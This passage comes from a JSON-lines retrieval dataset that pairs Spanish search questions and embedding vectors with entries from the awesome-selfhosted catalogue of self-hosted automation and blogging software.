"fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Automation: Kibitzr β€” Lightweight personal web assistant with powerful integrations [MIT, Python]. LazyLibrarian β€” Follow authors and grab metadata for all your digital reading needs. It uses a combination of Goodreads, Librarything and optionally GoogleBooks as sources for author info and book info [⚠, GPL-3.0, Python]. Leon β€” Personal assistant who can live on your server [MIT, Nodejs]. Matchering β€” Automated music mastering (alternative to LANDR, eMastered and MajorDecibel) [GPL-3.0, Docker]. Mylar3 β€” Automated Comic Book (cbr/cbz) downloader program for use with NZB and torrents [GPL-3.0, Python/Docker]. OliveTin β€” Web interface for running Linux shell commands [AGPL-3.0, Go]. pyLoad β€” Lightweight, customizable and remotely manageable downloader for 1-click-hosting sites like rapidshare.com or uploaded.to [AGPL-3.0, Python].", "indexar": "existe una herramienta automΓ‘tica para el masterizado de mΓΊsica alternativa a LANDR?", "v": [-0.0365, 0.04062, -0.05274, -0.18065, -0.12403, 0.01676, -0.19709, 0.01895, -0.22287, 0.03849, -0.01977, -0.19021, 0.07434, -0.13639, 0.09453, 0.00285, 0.05565, -0.10205, -0.03414, -0.01858, -0.04158, -0.02052, -0.12711, -0.06682, -0.0816, -0.07136, 0.01631, -0.05243, -0.26464, 0.11191, 0.01823, 0.10016, -0.0086, -0.02533, -0.14653, -0.08989, 0.08647, 0.12802, 0.05495, 0.02472, -0.04363, 0.02555, 0.01897, 0.04975, 0.05032, 0.04282, 0.0108, 0.04712, 0.03033, 0.12866, -0.01723, 0.03053, -0.07842, -0.00556, 0.10052, -0.18069, 0.11965, -0.12435, 0.01836, -0.13129, -0.07757, 0.02885, -0.09716, 0.03869, 0.01605, 0.11862, 0.08326, -0.05827, 0.00838, 0.09678, -0.02614, 0.04372, 0.06767, -0.0281, -0.0984, 0.06987, 0.00029, -0.00373, -0.02908, 0.03587, 0.02044, -0.0415, -0.03073, 0.00485, -0.0525, -0.06771, 0.12247, -0.06497, -0.0273, -0.00386, -0.05654, 0.06169, 0.01705, 0.08312, 0.08733, -0.05412, 0.00872, -0.07539, -0.04834, -0.01464, 0.14859, -0.04449, -0.09278, 0.02128, 0.06605, 0.02371, 0.01689, 0.01974, -0.03727, 0.06671, -0.02845, 0.09507, 0.02426, -0.04813, 0.01134, -0.03517, 0.00954, 0.00265, -0.02664, 0.03638, 0.02369, 0.03547, -0.05558, -0.05306, -0.00317, -0.00874, -0.03923, 0.058, 0.00722, -0.0503, 0.0816, -0.05911, -0.0137, -0.08723, -0.01058, -0.02347, 0.04921, -0.08976, 0.01952, -0.03218, 0.01397, 0.07273, -0.01957, -0.09014, 0.02883, -0.03422, 0.03217, -0.02674, 0.04126, 0.00908, -0.07935, 0.03908, -0.07308, 0.02241, -0.02688, 0.08124, -0.02595, 0.05069, -0.01924, 0.01617, -0.02637, -0.03742, 0.00287, -0.02756, -0.04363, 0.03183, 0.03401, 0.00699, 0.00185, 0.00396, -0.00584, 0.03747, 0.12722, -0.04979, -0.08954, -0.09212, -0.05338, -0.08779, 0.03206, -0.07877, -0.0339, -0.01383, -0.0422, -0.04207, 0.09858, -0.02472, 0.03943, -0.03254, -0.02283, -0.01671, -0.03043, 0.02132, -0.02578, -0.03116, 0.07407, 0.01348, -0.00434, -0.07165, -0.06779, 0.05393, -0.08606, -0.01716, -0.01897, -0.06494, 0.01363, 0.03497, 0.02916, -0.00195, 0.03469, 0.00858, 0.00301, -0.02317, -0.01641, 0.04176, 0.02672, 0.00789, -0.08042, -0.00025, -0.04129, -0.00329, -0.02801, 0.00985, 0.05909, 0.04139, -0.03054, 0.04825, 0.01352, 0.0546, 0.01752, -0.01792, -0.0129, 0.02514, 0.03556, 0.01712, 0.00314, -0.00496, -0.05213, -0.03822, -0.0248, 0.01695, -0.01145, -0.02431, 0.04668, 0.00937, -0.04103, -0.02328, 0.00802, -0.04705, -0.02158, -0.00529, 0.02626, 0.0103, -0.00289, 0.02663, 0.06116, 0.0446]} +{"tipo": "pregunta", "herramienta": "Automation", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Automation", "tema": "automation", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Automation: Kibitzr β€” Lightweight personal web assistant with powerful integrations [MIT, Python]. LazyLibrarian β€” Follow authors and grab metadata for all your digital reading needs. It uses a combination of Goodreads, Librarything and optionally GoogleBooks as sources for author info and book info [⚠, GPL-3.0, Python]. Leon β€” Personal assistant who can live on your server [MIT, Nodejs]. Matchering β€” Automated music mastering (alternative to LANDR, eMastered and MajorDecibel) [GPL-3.0, Docker]. Mylar3 β€” Automated Comic Book (cbr/cbz) downloader program for use with NZB and torrents [GPL-3.0, Python/Docker]. OliveTin β€” Web interface for running Linux shell commands [AGPL-3.0, Go]. pyLoad β€” Lightweight, customizable and remotely manageable downloader for 1-click-hosting sites like rapidshare.com or uploaded.to [AGPL-3.0, Python].", "indexar": "cual es una alternativa libre para descargar cΓ³mics desde NZB?", "v": [-0.11478, 0.00428, 0.05517, 0.01877, -0.04742, -0.0402, -0.10896, 0.02963, -0.14104, -0.11954, -0.03387, -0.23271, -0.12143, 0.05708, 0.01768, -0.01806, -0.03043, -0.02888, 0.12575, 0.08115, 0.12445, -0.04255, -0.0426, -0.11736, 0.05063, -0.10992, -0.04712, -0.01194, -0.12238, 0.0303, -0.04258, -0.10216, 0.07117, 0.01592, -0.01138, 0.06453, 0.20497, 0.02283, 0.09413, -0.03619, 0.05638, -0.06842, -0.08712, 0.10741, -0.03117, -0.0448, -0.05878, 0.00727, 0.00393, -0.03246, -0.01439, 0.02467, -0.03728, -0.00088, -0.00464, -0.17888, 0.09751, -0.09347, -0.05742, 0.00126, -0.0167, 0.09021, 0.02762, -0.15354, -0.01718, 0.02885, -0.05728, 0.02675, -0.08968, 0.05303, 0.03298, -0.0274, 0.06135, -0.07838, -0.06622, 0.03529, -0.09586, -0.14911, 0.00858, -0.01305, 0.13591, -0.11477, -0.0026, 0.02396, 0.01308, -0.10263, 0.04405, -0.13599, 0.05767, 0.01293, 0.00532, 0.00752, -0.03891, 0.0615, -0.04744, -0.10552, -0.02425, 0.06032, 0.06239, 0.12484, -0.01483, 0.02906, -0.10711, -0.00677, -0.08471, -0.03189, 0.0153, 0.00776, -0.0459, 0.06625, -0.04, -0.0093, 0.06431, 0.05698, -0.10926, -0.07264, -0.06178, 0.00419, 0.06635, -0.04905, -0.0611, -0.00757, -0.08968, 0.03186, 0.05024, -0.00647, 0.10478, -0.00164, -0.08238, -0.008, 0.05279, -0.08471, -0.11476, -0.07358, -0.08756, -0.00348, 0.03832, -0.03101, -0.03161, 0.00581, 0.05089, 0.01939, 0.04849, 0.0388, 0.04845, -0.04006, -0.06311, -0.06008, 0.03418, -0.06785, -0.00159, 0.00396, 0.0527, 0.03137, 0.0442, 0.05193, -0.01873, -0.05886, -0.01439, 0.05517, 0.06705, -0.01207, 0.05235, -0.03462, -0.05434, -0.00229, -0.05084, 0.01123, -0.07495, 0.03445, -0.02548, 0.07042, 0.01567, -0.09326, 0.14297, -0.08607, -0.00231, -0.05091, 0.06695, -0.00266, 0.00749, 0.00649, -0.00239, 0.0088, -0.06679, -0.06918, 0.05633, 0.02948, 0.04928, -0.02593, -0.04001, -0.01659, -0.07439, -0.01789, -0.03199, 0.0018, -0.03727, -0.06244, -0.05514, -0.04167, -0.12922, 0.00055, -0.02564, -0.01187, 0.02503, -0.03192, 0.02026, 0.06598, -0.05406, -0.00191, -0.01142, 0.00544, 0.06487, -0.00316, -0.00399, -0.07816, 0.01888, -0.02752, 0.0298, -0.01121, -0.02567, 0.03118, 0.03456, -0.02318, -0.07412, 0.03927, 0.05254, 0.05501, -0.00988, 0.04945, -0.00617, 0.1064, 0.06095, 0.01681, 0.01043, 0.03671, 0.01233, 0.0875, -0.02737, -0.02422, 0.0628, 0.08817, 0.00747, -0.01718, -0.03821, -0.01694, -0.07602, -0.01656, -0.0328, -0.04823, -0.02595, 0.05487, 0.02399, 0.03225, 0.02543, 0.01933]} +{"tipo": "pregunta", "herramienta": "Automation", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Automation", "tema": "automation", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Automation: StackStorm β€” StackStorm (aka _IFTTT for Ops_) is event-driven automation for auto-remediation, security responses, troubleshooting, deployments, and more. Includes rules engine, workflow, 160 integration packs with 6000+ actions and ChatOps [Apache-2.0, Python]. Β΅Task β€” Automation engine that models and executes business processes declared in yaml [BSD-3-Clause, Go/Docker].", "indexar": "que herramienta sirve para automatizar tareas y respuestas de seguridad?", "v": [0.00791, 0.09839, -0.14995, -0.23641, 0.03466, -0.14342, -0.13023, -0.06009, 0.00612, 0.0746, -0.12348, -0.10198, 0.09277, 0.02978, 0.11043, 0.07767, 0.0916, -0.04105, -0.00185, 0.0791, 0.07697, -0.05095, -0.08065, -0.05886, -0.1266, 0.07024, 0.03938, -0.05802, -0.24202, 0.09239, 0.0203, -0.00774, 0.06501, -0.06041, -0.053, -0.01276, -0.00452, 0.08538, -0.02211, 0.09346, -0.06346, 0.0584, -0.04579, 0.03834, 0.12749, 0.06916, 0.05822, -0.06252, 0.08381, 0.059, -0.0535, -0.18196, 0.00232, -0.10031, -0.03136, -0.09534, 0.18621, -0.08682, 0.05126, -0.1151, -0.15724, 0.03683, -0.02321, 0.026, 0.01347, -0.02519, 0.07726, -0.05812, -0.00116, 0.08596, 0.01334, 0.03948, 0.00217, 0.0389, -0.05486, -0.0295, -0.02875, 0.06385, -0.01404, 0.06696, 0.01749, 0.0186, -0.07787, -0.0125, -0.05825, -0.11347, 0.00074, -0.04816, -0.03178, -0.02919, -0.03512, 0.12126, 0.03514, 0.03508, 0.03232, 0.01504, 0.03743, -0.01997, -0.01649, 0.01882, 0.12525, -0.15017, -0.03325, 0.08486, -0.0216, 0.024, -0.02997, 0.03013, -0.01544, -0.08249, 0.03046, 0.0166, -0.01366, -0.0352, -0.06043, 0.07171, -0.02912, -0.02458, 0.06726, 0.01547, 0.01386, 0.05116, -0.00251, -0.02996, 0.07699, -0.03361, 0.09346, 0.08769, 0.01299, -0.09252, 0.05217, -0.05832, -0.12069, 0.01129, 0.00421, 0.02139, 0.05511, -0.16162, -0.07822, -0.09686, 0.02065, 0.07364, 0.0167, -0.1031, 0.02103, 0.07784, 0.0411, -0.04362, 0.00443, 0.04083, 0.03485, -0.04713, 0.03894, 0.00676, 0.0051, 0.05021, -0.04923, 0.03259, -0.01245, 0.05625, 0.02916, -0.03456, 0.05648, 0.01244, -0.0183, -0.06422, 0.06142, -0.0145, 0.03742, 0.0193, 0.00694, 0.03998, 0.09573, -0.07475, -0.017, -0.02571, -0.01477, -0.00277, 0.0147, -0.02424, -0.00194, -0.02745, -0.01326, 0.00444, 0.09257, -0.09419, 0.07541, -0.06214, -0.02538, 0.05466, -0.04314, -0.04438, -0.04413, -0.05051, 0.01779, 0.03569, 0.00616, -0.06692, -0.02616, -0.03178, -0.01672, -0.00517, -0.01683, -0.00764, -0.01548, 0.1011, 0.03977, 0.02124, 0.04086, -0.03636, 0.03851, 0.03787, 0.06004, -0.01716, -0.01263, -0.06595, -0.00927, 0.02801, -0.05172, 0.0337, 0.02727, -0.01782, -0.00293, -0.0242, 0.0156, 0.04366, 0.06138, 0.02749, 0.03021, -0.03114, 0.01018, 0.00235, -0.0355, -0.00116, 0.03029, -0.07178, 0.00136, -0.01086, -0.02349, -0.0701, -0.01174, 0.03284, 0.00408, -0.06699, -0.09146, -0.01079, 0.0087, -0.00645, -0.03798, -0.07359, -0.04826, 0.00334, 0.00614, 0.0011, 0.00924, -0.01793]} +{"tipo": "pregunta", "herramienta": "Automation", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Automation", "tema": "automation", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Automation: StackStorm β€” StackStorm (aka _IFTTT for Ops_) is event-driven automation for auto-remediation, security responses, troubleshooting, deployments, and more. Includes rules engine, workflow, 160 integration packs with 6000+ actions and ChatOps [Apache-2.0, Python]. Β΅Task β€” Automation engine that models and executes business processes declared in yaml [BSD-3-Clause, Go/Docker].", "indexar": "con que puedo montar una automatizaciΓ³n basada en eventos para la remediaciΓ³n?", "v": [0.03429, 0.1139, -0.12378, -0.18541, -0.11708, 0.08348, -0.10476, 0.05672, -0.17374, -0.15068, -0.13502, -0.08617, 0.11846, 0.04089, 0.05214, 0.12799, -0.0026, -0.06817, 0.05992, 0.08431, 0.01563, -0.07504, -0.07497, -0.07402, 0.03578, 0.02216, 0.10305, 0.02121, -0.21601, -0.02139, -0.01445, 0.09293, -0.0008, 0.05986, -0.00402, -0.12738, 0.02402, 0.05699, 0.00709, -0.05181, -0.17994, -0.04723, -0.02055, -0.00521, 0.04252, 0.008, 0.01516, -0.04235, -0.05529, -0.03431, 0.10578, 0.03471, -0.09337, -0.04537, -0.02554, -0.10843, 0.04897, -0.09545, 0.02254, -0.05287, 0.01188, 0.01865, -0.13708, 0.0649, 0.02759, 0.1165, 0.00521, -0.02027, -0.02054, 0.07819, -0.02909, -0.13385, -0.00346, 0.01364, 0.04157, 0.06686, -0.03783, 0.04574, -0.00536, 0.07015, -0.09329, -0.01907, 0.05548, 0.06145, 0.00605, -0.01557, -0.03308, -0.09642, -0.00176, -0.01964, -0.06681, 0.0189, 0.13249, -0.0311, 0.01154, -0.14036, 0.10815, -0.03581, -0.05616, 0.01418, -0.06275, -0.04077, 0.02332, 0.05018, 0.04549, -0.11756, 0.13518, 0.0151, 0.08466, -0.03483, 0.00671, 0.13273, -0.11773, -0.00199, -0.13889, -0.00512, 0.07983, 0.02616, 0.01446, 0.00458, -0.01612, 0.03238, 0.09023, -0.00388, 0.03815, 0.03393, 0.06441, 0.18383, -0.07841, -0.04649, 0.06753, -0.0113, -0.07476, -0.0299, -0.00819, -0.01803, -0.01668, -0.04601, -0.05058, -0.04135, -0.00053, -0.02142, 0.04526, -0.04424, 0.06897, -0.00953, 0.07047, -0.05451, 0.00645, 0.04631, 0.0233, 0.08031, 0.07456, 0.01723, -0.11095, -0.05693, 0.02893, -0.01281, 0.09842, 0.09022, 0.00167, -0.02372, -0.0784, -0.03271, 0.04265, -0.01459, -0.05627, 0.01395, -0.00183, 0.0475, -0.02425, 0.04687, 0.0331, -0.02551, 0.03102, 0.08542, -0.04549, -0.01531, -0.00772, -0.03413, 0.02984, -0.02187, 0.03317, 0.01185, 0.09192, -0.03454, 0.06711, -0.02756, 0.00891, 0.00847, -0.05248, 0.03029, -0.02028, -0.04373, 0.04346, -0.02628, -0.0225, 0.00818, -0.04226, 0.03893, 0.02494, 0.02314, 0.01598, 0.03141, -0.05248, 0.00162, 0.05209, 0.11397, 0.06486, 0.03462, -0.04562, 0.06762, 0.01645, -0.04701, -0.0257, 0.0488, 0.00852, 0.00422, -0.01662, -0.00139, 0.00409, -0.07293, 0.0202, 0.01637, 0.00113, -0.0646, 0.04967, 0.01941, 0.00261, -0.06247, -0.07126, 0.03087, 0.02742, 0.01831, -0.03215, 0.00797, 0.0208, 0.00421, 0.00167, 0.00922, -0.02744, 0.02818, -0.02862, -0.0639, -0.05336, 0.02371, -0.06523, 0.00088, -0.03885, -0.0621, 0.01816, 0.00331, -0.03851, -0.0111, -0.02401, 0.02777]} +{"tipo": "pregunta", "herramienta": "Blogging Platforms", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Blogging Platforms", "tema": "blogging platforms", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Blogging Platforms: Antville β€” Free, open source project aimed at the development of a high performance, feature rich weblog hosting software [Apache-2.0, Javascript]. Castopod β€” Podcast management hosting platform that includes the latest podcast 2.0 standards, an automated Fediverse feed, analytics, an embeddable player, and more [AGPL-3.0, PHP/Docker]. Chyrp Lite β€” Extra-awesome, extra-lightweight blog engine [BSD-3-Clause, PHP]. Dotclear β€” Take control over your blog [GPL-2.0, PHP]. Ech0 β€” Lightweight federated publishing platform focused on personal idea sharing (documentation in Chinese) [AGPL-3.0, Docker/K8S]. FlatPress β€” A lightweight, easy-to-set-up flat-file blogging engine [GPL-2.0, PHP]. fx β€” Micro-blog tool offering built-in syntax highlighting, mobile publishing and more (alternative to Twitter, Bluesky) [MIT, Docker]. Ghost β€” Just a blogging platform [MIT, Nodejs]. Haven β€” Private blogging system with markdown editing and built in RSS reader [MIT, Ruby].", "indexar": "que plataforma gratuita y de cΓ³digo abierto me sirve para crear un blog rΓ‘pido", "v": [-0.05298, 0.08835, -0.1726, -0.14673, -0.08872, -0.2165, -0.05704, 0.02128, -0.10152, -0.19403, -0.10458, -0.25279, 0.0583, -0.08901, 0.04076, -0.0513, 0.10634, -0.07129, 0.09519, -0.01588, -0.02495, -0.01233, -0.10892, -0.14283, 0.01512, -0.16373, 0.02532, -0.02189, -0.13553, 0.02322, -0.01162, -0.00155, 0.03429, 0.08304, -0.05584, 0.00303, 0.17613, 0.07186, -0.00314, 0.05408, -0.04119, 0.01351, -0.01313, 0.07284, 0.00103, 0.02945, 0.10309, 0.0256, -0.03313, 0.04489, -0.01281, -0.11705, -0.08863, 0.01596, -0.02451, 0.02638, 0.07766, -0.17793, -0.09438, -0.00448, -0.02906, -0.00115, 0.08179, -0.13417, -0.09127, -0.08483, 0.08874, 0.10435, -0.07833, 0.14487, 0.02981, -0.03674, -0.0019, -0.10679, 0.03967, 0.06301, -0.09727, -0.07375, -0.0362, 0.14464, 0.08176, -0.00307, -0.02067, -0.03005, 0.01171, -0.01375, 0.03452, -0.07018, -0.01808, -0.04658, 0.08346, 0.01317, -0.00209, 0.05197, -0.00328, -0.00817, 0.01069, -0.0273, 0.02654, -0.02646, -0.03376, -0.04428, -0.01942, 0.00582, 0.0711, 0.04917, 0.0661, -0.07024, -0.01153, -0.04322, 0.08019, -0.02125, -0.03581, 0.00062, -0.04966, -0.01438, -0.02147, 0.02283, 0.01079, 0.00674, -0.04187, 0.02966, -0.11315, -0.04245, 0.05087, 0.03867, 0.03593, 0.03781, -0.04997, 0.0293, -0.06867, -0.06806, -0.03262, 0.01697, 0.07261, -0.04659, 0.087, 0.02269, -0.03894, -0.01212, 0.02824, -0.00554, 0.01996, 5e-05, -0.01528, -0.06928, 0.01882, -0.08925, -0.04181, -0.02529, -0.07921, 0.06551, -0.06426, -0.03156, -0.13454, -0.08931, 0.00611, 0.01936, -0.13001, 0.05983, -0.0918, 0.01275, 0.01806, -0.00235, -0.03605, -0.06317, 0.00719, 0.02493, 0.0063, 0.07341, 0.01714, 0.06704, 0.08162, -0.11043, 0.07427, 0.00617, -0.01366, -0.00987, -0.03502, -0.0006, -0.02693, -0.02851, -0.02174, 0.00631, -0.03195, -0.0235, 0.07727, 0.02632, -0.01958, 0.0608, 0.01067, -0.03597, -0.04036, 0.00963, 0.01975, -0.00816, -0.00681, -0.05076, 0.01748, -0.06543, -0.03282, 0.01085, 0.00033, -0.04763, -0.05925, -0.00733, 0.02573, -0.00417, 0.00321, 0.02746, -0.00524, -0.00929, 0.04413, -0.03842, 0.02913, 0.01924, 0.02484, 0.02737, 0.06728, -0.05585, 0.04908, 0.00242, -0.05252, 0.02801, 0.03298, 0.04352, -0.02639, 0.00349, 0.00207, -0.02735, 0.00949, -0.06378, -0.02564, -0.04831, 0.00806, -0.03179, -0.00185, 0.04851, -0.05036, 0.02264, -0.04347, 0.00441, 0.0366, -0.05076, 0.01841, -0.01836, 0.00057, -0.04057, -0.03955, -0.08729, -0.06637, -0.02427, 0.04573, -0.01786, -0.03587, 0.0485]} +{"tipo": "pregunta", "herramienta": "Blogging Platforms", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Blogging Platforms", "tema": "blogging platforms", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Blogging Platforms: Antville β€” Free, open source project aimed at the development of a high performance, feature rich weblog hosting software [Apache-2.0, Javascript]. Castopod β€” Podcast management hosting platform that includes the latest podcast 2.0 standards, an automated Fediverse feed, analytics, an embeddable player, and more [AGPL-3.0, PHP/Docker]. Chyrp Lite β€” Extra-awesome, extra-lightweight blog engine [BSD-3-Clause, PHP]. Dotclear β€” Take control over your blog [GPL-2.0, PHP]. Ech0 β€” Lightweight federated publishing platform focused on personal idea sharing (documentation in Chinese) [AGPL-3.0, Docker/K8S]. FlatPress β€” A lightweight, easy-to-set-up flat-file blogging engine [GPL-2.0, PHP]. fx β€” Micro-blog tool offering built-in syntax highlighting, mobile publishing and more (alternative to Twitter, Bluesky) [MIT, Docker]. Ghost β€” Just a blogging platform [MIT, Nodejs]. Haven β€” Private blogging system with markdown editing and built in RSS reader [MIT, Ruby].", "indexar": "cual es una alternativa libre a Ghost o WordPress que no requiera base de datos compleja", "v": [0.01368, 0.04402, -0.08151, -0.04168, -0.05107, 0.01214, -0.02044, -0.08494, -0.07312, -0.13648, -0.00506, -0.07882, -0.08254, 0.0224, 0.06847, -0.18707, 0.07105, -0.02662, -0.02138, 0.02811, -0.1111, -0.14449, 0.04067, -0.10241, -0.09685, -0.11634, 0.01115, 0.05034, -0.10595, 0.00873, -0.04065, -0.13058, -0.10258, 0.01071, -0.06065, 0.12786, 0.02881, 0.06547, 0.10181, -0.08207, 0.1286, -0.03893, -0.01683, 0.19878, -0.0181, -0.06519, -0.04566, 0.0072, 0.04618, 0.0286, -0.06322, 0.02471, -0.12867, 0.06353, 0.0583, -0.04605, 0.15803, -0.16801, -0.06903, 0.14653, -0.142, 0.07413, -0.01236, 0.0432, -0.05274, 0.00299, 0.01193, 0.01588, -0.0223, 0.09823, 0.10991, -0.01782, -0.00844, -0.17074, -0.04442, -0.00252, 0.01906, -0.02022, -0.05552, -0.01162, 0.0209, -0.02997, -0.01045, 0.00201, -0.11657, -0.04245, 0.08722, -0.05056, -0.00866, 0.13529, 0.14959, 0.04907, -0.03025, 0.17635, -0.01257, -0.0588, -0.00249, -0.05142, 0.00173, 0.03518, -0.00487, 0.06331, 0.01295, 0.07281, 0.14565, -0.0094, 0.05335, 0.06402, -0.11989, -0.07503, -0.02511, 0.08259, -0.02977, 0.02398, -0.03387, -0.13111, -0.00214, 0.02311, 0.01053, 0.05419, 0.0241, 0.05483, -0.02404, -0.02884, 0.09672, 0.06553, -0.02049, 0.06759, -0.00694, 0.00741, 0.04075, 0.00228, -0.10612, 0.0588, -0.07418, 0.1469, 0.00174, 0.00635, 0.04284, -0.02758, -0.00762, -0.00213, 0.05321, -0.01007, 0.05771, -0.02682, 0.0467, 0.02349, -0.02059, -0.03675, -0.07387, 0.02971, 0.0401, 0.13502, -0.0702, 0.03892, 0.00558, -0.01244, -0.04834, 0.06889, -0.05036, -0.03626, -0.04496, 0.04604, -0.05571, -0.06022, -0.02245, 0.01443, -0.02368, 0.02224, -0.02538, 0.01842, 0.05252, -0.06863, 0.06783, 0.03352, -0.01136, -0.1219, -0.00856, -0.024, 0.01911, -0.01672, -0.06443, -0.01038, -0.01341, -0.02411, -0.00427, 0.00019, -0.03826, 0.02693, -0.05484, 0.01801, -0.0148, -0.10584, 0.00132, -0.00505, -0.03845, -0.07264, 0.03543, 0.00426, -0.06974, 0.0133, -0.06757, 0.00499, -0.00145, 0.01371, -3e-05, -0.00447, 0.04236, -0.04022, 0.03346, -0.02628, -0.01543, -0.01265, 0.01969, -0.05836, -0.00424, -0.01969, 0.01422, -0.01451, -0.01498, 0.10527, 0.0632, 0.00441, -0.03349, -0.01764, 0.03285, 0.03763, 0.0035, 0.00109, -0.03083, -0.0106, 0.00751, 0.04581, 0.01574, -0.03965, -0.04298, 0.0072, -0.03087, -0.01148, 0.05159, 0.04655, -0.04643, -0.06109, 0.01089, -0.04093, -0.10522, 0.04413, 0.00952, -0.0615, -0.00769, 0.02154, -0.00193, -0.01927, -0.02359, 0.00692]} +{"tipo": "pregunta", "herramienta": "Blogging Platforms", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Blogging Platforms", "tema": "blogging platforms", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Blogging Platforms: Antville β€” Free, open source project aimed at the development of a high performance, feature rich weblog hosting software [Apache-2.0, Javascript]. Castopod β€” Podcast management hosting platform that includes the latest podcast 2.0 standards, an automated Fediverse feed, analytics, an embeddable player, and more [AGPL-3.0, PHP/Docker]. Chyrp Lite β€” Extra-awesome, extra-lightweight blog engine [BSD-3-Clause, PHP]. Dotclear β€” Take control over your blog [GPL-2.0, PHP]. Ech0 β€” Lightweight federated publishing platform focused on personal idea sharing (documentation in Chinese) [AGPL-3.0, Docker/K8S]. FlatPress β€” A lightweight, easy-to-set-up flat-file blogging engine [GPL-2.0, PHP]. fx β€” Micro-blog tool offering built-in syntax highlighting, mobile publishing and more (alternative to Twitter, Bluesky) [MIT, Docker]. Ghost β€” Just a blogging platform [MIT, Nodejs]. Haven β€” Private blogging system with markdown editing and built in RSS reader [MIT, Ruby].", "indexar": "con que programa puedo gestionar mi podcast y subirlo automΓ‘ticamente", "v": [0.03065, 0.14446, -0.15262, -0.20885, 0.03125, -0.03887, -0.01942, -0.05329, -0.12569, -0.12385, -0.08375, -0.09269, -0.03452, -0.06921, -0.09466, 0.00776, 0.10965, -0.02821, 0.02019, 0.08992, 0.09716, 0.02269, 0.03076, -0.1102, 0.15896, 0.00735, 0.11854, 0.05989, -0.09287, -0.06733, 0.00371, 0.03871, -0.00622, -0.08648, -0.05994, -0.03177, 0.05812, 0.16519, -0.04357, 0.00858, -0.04949, 0.04804, 0.01045, -0.01597, 0.05483, -0.03903, 0.05376, -0.04142, -0.01964, 0.00508, -0.02364, -0.05702, 0.05086, -0.0063, 0.02596, 0.00092, -0.02181, -0.19034, -0.08353, 0.01858, -0.06378, 0.05694, 0.05111, -0.0219, -0.00478, 0.01528, 0.00233, 0.05304, -0.03687, 0.16252, -0.10606, -0.06335, 0.02628, 0.05267, 0.09071, 0.05792, 0.04116, -0.03096, 0.10145, -0.0073, -0.02566, -0.02413, 0.10063, 0.13185, -0.07434, 0.10182, -0.02865, -0.04669, -0.02709, 0.04031, -0.06814, -0.06919, 0.04673, -0.01053, 0.04356, -0.03685, 0.1957, -0.00841, -0.01222, -0.07202, -0.02076, 0.03054, -0.00977, 0.13281, 0.03297, 0.12526, 0.02132, -0.10221, -0.04547, 0.13557, -0.01039, 0.04273, 0.00914, -0.09196, -0.10679, -0.00608, 0.01682, -0.13064, 0.01138, -0.01641, -0.03082, 0.04338, 0.03334, 0.00122, 0.09082, -0.01323, 0.00026, 0.09643, 0.00761, 0.04403, 0.01546, 0.01032, 0.02805, -0.06284, -0.01884, -0.08069, -0.00081, 0.07019, -0.04649, -0.01414, -0.02719, 0.10756, 0.05063, -0.02937, 0.02633, -0.13089, -0.09317, -0.1599, 0.0343, -0.0181, 0.04178, 0.02745, -0.03509, 0.02977, 0.03337, -0.01939, 0.05532, -0.08579, -0.05282, 0.0106, 0.00433, -0.03088, 0.00062, -0.01445, 0.03438, -0.00349, 0.03772, -0.00945, 0.02571, -0.00308, -0.08398, 0.04424, 0.03813, -0.06596, 0.0035, -0.03914, -0.00607, -0.09493, 0.12099, -0.01084, -0.09666, -0.0054, 0.11214, -0.01007, -0.04882, 0.00381, -0.02612, 0.00644, -0.04331, 0.03134, -0.0519, 0.00706, -0.031, -0.02727, 0.05684, -0.01797, 0.03318, -0.01225, -0.04201, 0.02433, -0.07536, -0.00947, 0.07188, 0.03677, 0.02078, 0.03176, 0.00889, -0.00644, 0.12176, 0.10373, -0.02339, -0.00714, 0.05257, 0.01623, 0.00074, -0.04141, -0.04093, 0.03332, 0.02131, -0.00841, -0.02157, 0.06357, 0.11709, 0.03849, -0.03754, -0.00093, 0.05096, 0.06474, 0.01755, 0.00607, -0.06883, 0.00252, 0.03094, 0.03048, 0.02219, -0.01037, 0.02061, 0.00745, -0.08231, -0.02527, -0.03892, 0.07666, 0.08574, -0.02199, -0.01422, 0.0167, -0.01053, 0.04999, 0.00447, 0.03779, -0.04447, 0.01349, 0.01259, -0.01255, 0.00857, 0.03701]} +{"tipo": "pregunta", "herramienta": "Blogging Platforms", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Blogging Platforms", "tema": "blogging platforms", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Blogging Platforms: HTMLy β€” Databaseless PHP blogging platform. A flat-file CMS that allows you to create a fast, secure, and powerful website or blog in seconds [GPL-2.0, PHP]. Known β€” Collaborative social publishing platform [Apache-2.0, PHP]. Mataroa β€” Naked blogging platform for minimalists [MIT, Python]. PluXml β€” XML-based blog/CMS platform [GPL-3.0, PHP]. Serendipity β€” Serendipity (s9y) is a highly extensible and customizable PHP blog engine using Smarty templating [BSD-3-Clause, PHP]. WriteFreely β€” Writing software for starting a minimalist, federated blog β€” or an entire community [AGPL-3.0, Go].", "indexar": "quΓ© programa puedo usar para montar un blog sin necesidad de base de datos?", "v": [-0.0743, 0.13158, -0.15262, -0.13852, -0.10392, -0.05297, -0.06058, -0.06501, -0.18032, -0.09504, -0.10827, -0.14195, -0.04453, -0.06856, -0.05325, 0.00074, 0.05217, -0.14385, 0.05003, -0.0204, -0.05309, -0.07691, -0.05398, -0.05711, -0.10017, 0.06096, 0.03027, -0.04581, -0.11785, 0.09589, -0.01972, 0.04075, -0.00128, 0.01733, -0.04746, -0.01122, 0.03657, -0.031, 0.03182, -0.04388, 